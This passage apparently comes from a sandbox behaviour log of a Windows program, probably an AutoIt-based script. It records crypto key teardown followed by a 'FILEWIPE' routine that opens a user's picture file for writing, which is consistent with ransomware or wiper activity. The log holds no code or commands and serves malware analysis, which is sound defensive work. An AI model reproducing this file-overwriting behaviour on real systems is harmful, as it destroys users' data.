lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.376] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0040.376] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0040.376] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0040.376] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0040.376] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0040.376] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0040.376] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0040.376] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.384] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.384] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.384] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0040.384] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.389] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.389] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.389] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0040.390] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.390] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0040.390] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0040.390] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0040.390] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.390] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0040.390] PeekMessageW (in: lpMsg=0x6ae3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3fc) returned 0 [0040.390] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.390] CryptDestroyKey (hKey=0x7c21c0) returned 1 [0040.390] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0040.390] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0040.390] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0040.390] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1aa8 | out: hHeap=0x770000) returned 1 [0040.390] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0040.390] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0040.390] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0040.390] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.390] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0040.390] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0040.390] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0040.390] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0040.391] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0040.391] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0040.391] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0040.391] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.391] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0040.391] PeekMessageW (in: lpMsg=0x6ae3d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3d4) returned 0 [0040.391] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0040.391] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c21c0 | out: hHeap=0x770000) returned 1 [0040.391] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0040.391] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0040.391] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0040.391] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0040.391] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0040.391] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.391] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0040.391] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1800 | out: hHeap=0x770000) returned 1 [0040.391] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0040.391] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.391] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0040.391] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.391] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0040.391] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0040.391] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0040.391] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0040.391] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0040.391] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.391] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0040.392] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.392] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0040.392] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0040.392] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.392] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0040.392] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.392] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0040.392] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0040.392] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0040.392] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b98 | out: hHeap=0x770000) returned 1 [0040.392] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0040.392] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0040.392] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.392] CryptReleaseContext (hProv=0x7d5bb8, dwFlags=0x0) returned 1 [0040.392] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.392] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0040.392] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.392] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0040.392] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0040.392] FreeLibrary (hLibModule=0x754b0000) returned 1 [0040.392] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0040.392] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1800 | out: hHeap=0x770000) returned 1 [0040.392] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.392] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c21c0 | out: hHeap=0x770000) returned 1 [0040.392] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.392] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0040.392] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0040.392] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.393] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.393] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.394] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0040.394] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0040.394] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a08 | out: hHeap=0x770000) returned 1 [0040.394] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0040.394] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.394] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.394] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\T4n1IOAv.jpg", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa4033360, ftCreationTime.dwHighDateTime=0x1d5b808, ftLastAccessTime.dwLowDateTime=0xfcd55950, ftLastAccessTime.dwHighDateTime=0x1d5c28f, ftLastWriteTime.dwLowDateTime=0xfcd55950, ftLastWriteTime.dwHighDateTime=0x1d5c28f, nFileSizeHigh=0x0, nFileSizeLow=0x17ce9, dwReserved0=0x0, dwReserved1=0x777648, cFileName="T4n1IOAv.jpg", cAlternateFileName="")) returned 0x7c2100 [0040.394] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0040.394] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0040.394] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0040.394] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1dc8 | out: hHeap=0x770000) returned 1 [0040.394] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0040.394] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.394] CharLowerBuffW (in: lpsz="byte[97513]", cchLength=0xb | out: lpsz="byte[97513]") returned 0xb [0040.395] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.395] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0040.395] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0040.395] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0040.395] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.395] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0040.395] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0040.396] FreeLibrary (hLibModule=0x76b40000) returned 1 [0040.396] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0040.396] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0040.396] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0040.396] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a80 | out: hHeap=0x770000) returned 1 [0040.396] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b15a8 | out: hHeap=0x770000) returned 1 [0040.396] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0040.396] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0040.396] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0040.396] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0040.396] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0040.396] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0040.396] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0040.396] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0040.396] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0040.396] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0040.396] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0040.396] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0040.396] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0040.396] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0040.396] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0040.396] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0040.396] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0040.396] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0040.396] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0040.396] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0040.396] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0040.396] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0040.396] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0040.396] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0040.397] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.397] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.397] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.397] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0040.397] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.397] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.397] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.397] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.397] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.397] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.397] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.397] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.397] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.397] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.397] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.397] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.397] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.397] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.398] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.398] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.398] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0040.398] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0040.399] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\T4n1IOAv.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\oaci\\4hhx5h ujxbt\\t4n1ioav.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0040.399] FreeLibrary (hLibModule=0x76e10000) returned 1 [0040.399] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.399] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.399] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.399] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0040.399] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.399] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.399] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0040.400] FreeLibrary (hLibModule=0x76e10000) returned 1 [0040.400] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.400] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.400] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.400] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.400] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0040.400] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.400] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.400] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0040.400] FreeLibrary (hLibModule=0x76e10000) returned 1 [0040.400] PeekMessageW (in: 